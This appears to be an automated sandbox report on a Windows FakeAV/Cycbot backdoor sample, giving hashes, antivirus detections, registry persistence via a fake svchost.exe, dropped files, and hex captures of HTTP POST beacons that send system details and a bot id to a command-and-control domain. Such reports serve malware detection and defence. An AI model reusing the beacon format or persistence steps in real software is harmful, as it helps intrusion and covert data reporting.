Analysis Date2014-07-19 04:36:54
MD516ded6fa4285fa085836d6946ee702c1
SHA18459524fd69adab3c6ed3982ab8df57de331616c

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: d1848d8dadcd26872e6d163f9c865c8a sha1: cc48cff93f7155d074c891c3626c04ab2240f819 size: 58880
Section.rdata md5: f7fd1edacf37c539fdbfa1ac22cdcec3 sha1: d7856f1a2c0e49ac22495896076742777d28948c size: 2048
Section.data md5: b24a1d771b64b6aec24c124e0d9a4226 sha1: 55d4e261d1a35ea70347bb3c72b4f4a349c141c7 size: 41984
Section.rsrc md5: 437fa968f2f96af2a13c6c96bb8ad543 sha1: d5df2a691461b7e8f0383a2439287b7a40c3fd45 size: 1024
Timestamp2005-11-16 10:00:36
VersionLegalCopyright: Copyright (C) 2010
ProductVersion: 1, 0, 0, 2
PrivateBuild: 1091
FileVersion: 1, 0, 0, 2
FileDescription: Windows Host Process
PEhash41c7fcd2f9e05434182bdcc93bd1114210745c33
IMPhash9b325cfee6a7f1f0e49b58f9f998183b
AV360 SafeGen:Variant.Kazy.2518
AVAd-AwareGen:Variant.Kazy.2518
AVAlwil (avast)MalOb-IJ [Cryp]
AVArcabit (arcavir)Packed.Krap.Hy
AVAuthentiumW32/Goolbot.A.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVCA (E-Trust Ino)Win32/FakeAV.S!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Agent-180276
AVDr. WebTrojan.Siggen2.7184
AVEmsisoftGen:Variant.Kazy.2518
AVEset (nod32)Win32/Kryptik.HUN
AVFortinetW32/Codepack.SJT!tr
AVFrisk (f-prot)W32/Goolbot.A.gen!Eldorado (generic, not disinfectable)
AVF-SecureGen:Variant.Kazy.2518
AVGrisoft (avg)Cryptic.BEN
AVIkarusTrojan.Win32.FakeAV
AVK7Backdoor ( 003210941 )
AVKasperskyPacked.Win32.Krap.hy
AVMalwareBytesTrojan.Agent
AVMcafeeBackDoor-EXI
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Variant.Kazy.2518
AVNormanswizzor/Heur.I
AVRisingno_virus
AVSophosMal/FakeAV-IS
AVSymantecTrojan.FakeAV!gen39
AVTrend MicroBKDR_CYCBOT.SME
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\stor.cfg
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSwww.google.com
Winsock DNSbookknowlege.com
Winsock DNS127.0.0.1
Winsock DNSxy95.cn
Winsock DNSfreenetgameonline.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe

Network Details:

DNSprotectyourpc-11.com
Type: A
69.43.161.170
DNSwww.google.com
Type: A
173.194.121.48
DNSwww.google.com
Type: A
173.194.121.49
DNSwww.google.com
Type: A
173.194.121.50
DNSwww.google.com
Type: A
173.194.121.51
DNSwww.google.com
Type: A
173.194.121.52
DNSxy95.cn
Type: A
DNSfreenetgameonline.com
Type: A
DNSbookknowlege.com
Type: A
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v41&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=main&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v41&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err088_1_0&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v41&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err073_2_1&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v41&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err084&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v41&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err095_1_8&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v41&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err088_2_0&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v41&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err073_2_2&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v41&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err084&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v41&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err095_2_3&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP GEThttp://www.google.com/
User-Agent:
HTTP GEThttp://www.google.com/
User-Agent:
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v41&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err094_43_11001&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v41&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err093_43_11001&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 69.43.161.170:80
Flows TCP192.168.1.1:1032 ➝ 69.43.161.170:80
Flows TCP192.168.1.1:1033 ➝ 69.43.161.170:80
Flows TCP192.168.1.1:1034 ➝ 69.43.161.170:80
Flows TCP192.168.1.1:1035 ➝ 69.43.161.170:80
Flows TCP192.168.1.1:1036 ➝ 69.43.161.170:80
Flows TCP192.168.1.1:1037 ➝ 69.43.161.170:80
Flows TCP192.168.1.1:1038 ➝ 69.43.161.170:80
Flows TCP192.168.1.1:1039 ➝ 69.43.161.170:80
Flows TCP192.168.1.1:1040 ➝ 173.194.121.48:80
Flows TCP192.168.1.1:1041 ➝ 173.194.121.48:80
Flows TCP192.168.1.1:1042 ➝ 69.43.161.170:80
Flows TCP192.168.1.1:1043 ➝ 69.43.161.170:80

Raw Pcap
0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 31267379 7374656d   ype=g_v41&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d6d 61696e26 6e3d3026   status=main&n=0&
0x00000070 (00112)   65787472 613d3020 48545450 2f312e31   extra=0 HTTP/1.1
0x00000080 (00128)   0d0a486f 73743a20 70726f74 65637479   ..Host: protecty
0x00000090 (00144)   6f757270 632d3131 2e636f6d 0d0a5573   ourpc-11.com..Us
0x000000a0 (00160)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x000000b0 (00176)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x000000c0 (00192)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x000000d0 (00208)   646f7773 204e5420 352e3129 0d0a436f   dows NT 5.1)..Co
0x000000e0 (00224)   6e74656e 742d4c65 6e677468 3a20300d   ntent-Length: 0.
0x000000f0 (00240)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000100 (00256)   73650d0a 0d0a                         se....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 31267379 7374656d   ype=g_v41&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723038 385f315f   status=err088_1_
0x00000070 (00112)   30266e3d 30266578 7472613d 30204854   0&n=0&extra=0 HT
0x00000080 (00128)   54502f31 2e310d0a 486f7374 3a207072   TP/1.1..Host: pr
0x00000090 (00144)   6f746563 74796f75 7270632d 31312e63   otectyourpc-11.c
0x000000a0 (00160)   6f6d0d0a 55736572 2d416765 6e743a20   om..User-Agent: 
0x000000b0 (00176)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000c0 (00192)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x000000d0 (00208)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000e0 (00224)   31290d0a 436f6e74 656e742d 4c656e67   1)..Content-Leng
0x000000f0 (00240)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a            n: close....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 31267379 7374656d   ype=g_v41&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723037 335f325f   status=err073_2_
0x00000070 (00112)   31266e3d 30266578 7472613d 30204854   1&n=0&extra=0 HT
0x00000080 (00128)   54502f31 2e310d0a 486f7374 3a207072   TP/1.1..Host: pr
0x00000090 (00144)   6f746563 74796f75 7270632d 31312e63   otectyourpc-11.c
0x000000a0 (00160)   6f6d0d0a 55736572 2d416765 6e743a20   om..User-Agent: 
0x000000b0 (00176)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000c0 (00192)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x000000d0 (00208)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000e0 (00224)   31290d0a 436f6e74 656e742d 4c656e67   1)..Content-Leng
0x000000f0 (00240)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a 73207365   n: close....s se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 31267379 7374656d   ype=g_v41&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723038 34266e3d   status=err084&n=
0x00000070 (00112)   30266578 7472613d 30204854 54502f31   0&extra=0 HTTP/1
0x00000080 (00128)   2e310d0a 486f7374 3a207072 6f746563   .1..Host: protec
0x00000090 (00144)   74796f75 7270632d 31312e63 6f6d0d0a   tyourpc-11.com..
0x000000a0 (00160)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x000000b0 (00176)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x000000c0 (00192)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x000000d0 (00208)   696e646f 7773204e 5420352e 31290d0a   indows NT 5.1)..
0x000000e0 (00224)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x000000f0 (00240)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000100 (00256)   6c6f7365 0d0a0d0a 0d0a0d0a            lose........

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 31267379 7374656d   ype=g_v41&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723039 355f315f   status=err095_1_
0x00000070 (00112)   38266e3d 30266578 7472613d 30204854   8&n=0&extra=0 HT
0x00000080 (00128)   54502f31 2e310d0a 486f7374 3a207072   TP/1.1..Host: pr
0x00000090 (00144)   6f746563 74796f75 7270632d 31312e63   otectyourpc-11.c
0x000000a0 (00160)   6f6d0d0a 55736572 2d416765 6e743a20   om..User-Agent: 
0x000000b0 (00176)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000c0 (00192)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x000000d0 (00208)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000e0 (00224)   31290d0a 436f6e74 656e742d 4c656e67   1)..Content-Leng
0x000000f0 (00240)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a 64306120   n: close....d0a 
0x00000110 (00272)   20202020 20202020 2020206e 3a20636c              n: cl
0x00000120 (00288)   6f73652e 2e2e2e0a                     ose.....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 31267379 7374656d   ype=g_v41&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723038 385f325f   status=err088_2_
0x00000070 (00112)   30266e3d 30266578 7472613d 30204854   0&n=0&extra=0 HT
0x00000080 (00128)   54502f31 2e310d0a 486f7374 3a207072   TP/1.1..Host: pr
0x00000090 (00144)   6f746563 74796f75 7270632d 31312e63   otectyourpc-11.c
0x000000a0 (00160)   6f6d0d0a 55736572 2d416765 6e743a20   om..User-Agent: 
0x000000b0 (00176)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000c0 (00192)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x000000d0 (00208)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000e0 (00224)   31290d0a 436f6e74 656e742d 4c656e67   1)..Content-Leng
0x000000f0 (00240)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a            n: close....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 31267379 7374656d   ype=g_v41&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723037 335f325f   status=err073_2_
0x00000070 (00112)   32266e3d 30266578 7472613d 30204854   2&n=0&extra=0 HT
0x00000080 (00128)   54502f31 2e310d0a 486f7374 3a207072   TP/1.1..Host: pr
0x00000090 (00144)   6f746563 74796f75 7270632d 31312e63   otectyourpc-11.c
0x000000a0 (00160)   6f6d0d0a 55736572 2d416765 6e743a20   om..User-Agent: 
0x000000b0 (00176)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000c0 (00192)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x000000d0 (00208)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000e0 (00224)   31290d0a 436f6e74 656e742d 4c656e67   1)..Content-Leng
0x000000f0 (00240)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a 73207365   n: close....s se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 31267379 7374656d   ype=g_v41&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723038 34266e3d   status=err084&n=
0x00000070 (00112)   30266578 7472613d 30204854 54502f31   0&extra=0 HTTP/1
0x00000080 (00128)   2e310d0a 486f7374 3a207072 6f746563   .1..Host: protec
0x00000090 (00144)   74796f75 7270632d 31312e63 6f6d0d0a   tyourpc-11.com..
0x000000a0 (00160)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x000000b0 (00176)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x000000c0 (00192)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x000000d0 (00208)   696e646f 7773204e 5420352e 31290d0a   indows NT 5.1)..
0x000000e0 (00224)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x000000f0 (00240)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000100 (00256)   6c6f7365 0d0a0d0a 20746869 73207365   lose.... this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 31267379 7374656d   ype=g_v41&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723039 355f325f   status=err095_2_
0x00000070 (00112)   33266e3d 30266578 7472613d 30204854   3&n=0&extra=0 HT
0x00000080 (00128)   54502f31 2e310d0a 486f7374 3a207072   TP/1.1..Host: pr
0x00000090 (00144)   6f746563 74796f75 7270632d 31312e63   otectyourpc-11.c
0x000000a0 (00160)   6f6d0d0a 55736572 2d416765 6e743a20   om..User-Agent: 
0x000000b0 (00176)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000c0 (00192)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x000000d0 (00208)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000e0 (00224)   31290d0a 436f6e74 656e742d 4c656e67   1)..Content-Leng
0x000000f0 (00240)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a            n: close....

0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a 6e74656e 742d5479    */*....ntent-Ty
0x00000050 (00080)   70653a20 74657874 2f68746d 6c0d0a44   pe: text/html..D
0x00000060 (00096)   6174653a 20536174 2c203139 204a756c   ate: Sat, 19 Jul
0x00000070 (00112)   20323031 34203033 3a33363a 35392047    2014 03:36:59 G
0x00000080 (00128)   4d540d0a 0d0a3c68 746d6c3e 0a20203c   MT....<html>.  <
0x00000090 (00144)   68656164 3e0a2020 20203c74 69746c65   head>.    <title
0x000000a0 (00160)   3e343034 204e6f74 20466f75 6e643c2f   >404 Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a 6e74656e 742d5479    */*....ntent-Ty
0x00000050 (00080)   70653a20 74657874 2f68746d 6c0d0a44   pe: text/html..D
0x00000060 (00096)   6174653a 20536174 2c203139 204a756c   ate: Sat, 19 Jul
0x00000070 (00112)   20323031 34203033 3a33363a 35392047    2014 03:36:59 G
0x00000080 (00128)   4d540d0a 0d0a3c68 746d6c3e 0a20203c   MT....<html>.  <
0x00000090 (00144)   68656164 3e0a2020 20203c74 69746c65   head>.    <title
0x000000a0 (00160)   3e343034 204e6f74 20466f75 6e643c2f   >404 Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 31267379 7374656d   ype=g_v41&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723039 345f3433   status=err094_43
0x00000070 (00112)   5f313130 3031266e 3d302665 78747261   _11001&n=0&extra
0x00000080 (00128)   3d302048 5454502f 312e310d 0a486f73   =0 HTTP/1.1..Hos
